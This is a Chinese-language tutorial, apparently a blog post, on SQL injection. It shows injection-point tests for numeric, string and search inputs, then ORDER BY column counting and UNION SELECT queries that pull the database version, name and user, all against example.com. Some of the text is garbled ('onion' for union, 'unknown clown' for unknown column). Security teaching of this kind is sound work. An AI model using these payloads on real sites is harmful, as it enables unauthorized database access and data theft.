1 基本概念
1.1 SQL inject 漏洞概述
在owasp发布的top 10漏洞里面,注入漏洞一直是危害排名第一,其中主要是指数据库注入型漏洞。
数据库注入漏洞,主要是开发人员在构建代码的时候,对输入边界没有进行过滤或者过滤不足,导致攻击者可以通过合法的输入点提交一些精心构造的语句,从而欺骗后台数据库对其进行执行,导致数据库信息泄露的一种漏洞。
例如:
1.2 SQL inject漏洞攻击流程及注入类型
1.2.1 注入点发现
自动方式:使用web漏洞扫描工具,自动进行注入点的发现。
手动方式:手工构造sql语句进行注入点的发现。
常见注入点类型:
数字型: user_id=$id
字符型: user_id="$id"
搜索型: text LIKE '%{_GET['search']}%'
判断注入点:
数字型注入: http://www.example.com/?id=7
提交:7 http://www.example.com/?id=7;
数据库执行: select *from example_table where id=7;
显示正常页面
提交:7 and 1=1 http://www.example.com/?id=7 and 1=1;
数据库执行 select *from example_table where id=7 and 1=1;
显示正常页面
提交:7 and 1=2 http://www.example.com/?id=7 and 1=2;
数据库执行 select *from example_table where id=7 and 1=2;
显示异常页面,说明and 1=2被数据库进行了处理。
单引号测试:http://www.example.com/?id=`;
显示异常页面报错,可以通过报错的信息知道,后台是否对单引号进行了处理。
字符型注入:http://www.example.com/?name='8'
原理同数字型注入。
提交:8
select *from example_table where name='8';
提交:8 and 1=1
select *from example_table where name='8 and 1=1';
并不会成功。
提交:8’ and 1=1 -- 注释掉数据库中后面的单引号。
select *from example_table where name='8’ and 1=1-- ';
提交:8’ and 1=2 -- 注释掉数据库中后面的单引号。
select *from example_table where name='8’ and 1=2-- ';
单引号测试:
select *from example_table where name='‘’;
语法报错,根据错误信息确认是否存在注入点。
搜索性注入:http://www.example.com/search.php?search=1
输入1:
select *from comment where comment_tex like '%1%';
输入1%’ and 1=1-- 或者 1%’ and '%1%' = '%2
select *from comment where comment_tex like '%1%' and 1=1-- %';
select *from comment where comment_tex like '%1%' and '%2%';
总而言之,就是对SQL中的各类型的输入进行闭合测试,构造合法SQL,欺骗后台执行。
1.2.2 信息获取
环境信息:数据库类型、数据库版本、操作系统版本、用户信息等
数据库信息:数据库名称、数据库表、表字段、字段内容(加密内容破解)。
onion联合查询:
想要获得更多的信息可以使用onion联合查询,联合查询的时候列数需要和主查询相同。如何确认主查询的列数呢?
使用order by确认主查询的列,就可以使用union构造相应的查询。order by x 是对结果进行排序,按照第x列进行排序,默认数字0-9,字母a-z,如果查询出来的结果有2列,说明这个语句查询了两个字段。
如:提交1' order by 2# 回显正常,1' order by 3#提示:unknown clown,则表示一共有2列。
接下来就可以构造联合查询了,先构造一个不成立的查询(或空条件),使得前面查询结果为空,然后使用union 1,2进行求值。这样就可以得到每个字段的名称,select 字段1、字段2 from users where id = ‘1’ union select 字段1,字段2 # 。
可以通过select version();获取当前数据库版本;
select database();获取当前数据库;
select user();取得当前登录的用户;
网友评论